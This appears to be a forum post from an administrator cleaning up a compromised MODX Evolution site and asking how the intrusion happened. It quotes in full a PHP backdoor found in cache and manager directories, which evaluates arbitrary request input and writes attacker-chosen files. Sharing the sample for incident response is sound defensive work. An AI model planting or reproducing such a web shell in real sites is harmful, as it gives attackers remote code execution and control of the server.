I'm posting to raise some awareness of this and see if anyone has any pointers or similar experiences that might help me track down the cause. I'm cleaning up a hacked Evo site... it was running something else before it got upgraded, and it's possible the hack occurred before we upgraded to 1.0.8. But then we kept finding junk on the server (hacker junk ... spam emails going out, all of that).
What I've found is a few index.php inside "discreet" locations that are designed to write payloads to the site. E.g. inside assets/cache/index.php, I see this code:
<?php $acbg = "c18eb49f0db2d26b08e63c54d5f1bc4e";
if(isset($_REQUEST['qelf'])) {
$toteot = $_REQUEST['qelf']; eval($toteot); exit();
}
if(isset($_REQUEST['lmuban'])) {
$kurxiw = $_REQUEST['yqxeryk'];
$luozk = $_REQUEST['lmuban'];
$ayplhp = fopen($luozk, 'w');
$tkjad = fwrite($ayplhp, $kurxiw);
fclose($ayplhp);
echo $tkjad;
exit();
}
?>
Similar code was found inside manager/media/script/forIE/index.php.
So a hacker can post to these files and create payloads anywhere on the site. Pretty nasty. The big question is how did these get there? I'm continuing to sniff around.
It should be noted that upgrading would not fix these holes: we gotta wipe the directory clean, install a fresh version of MODX, then reload the database and add known-clean versions of Snippets etc. back in.
[ed. note: Everettg_99 last edited this post 13 years, 7 months ago.]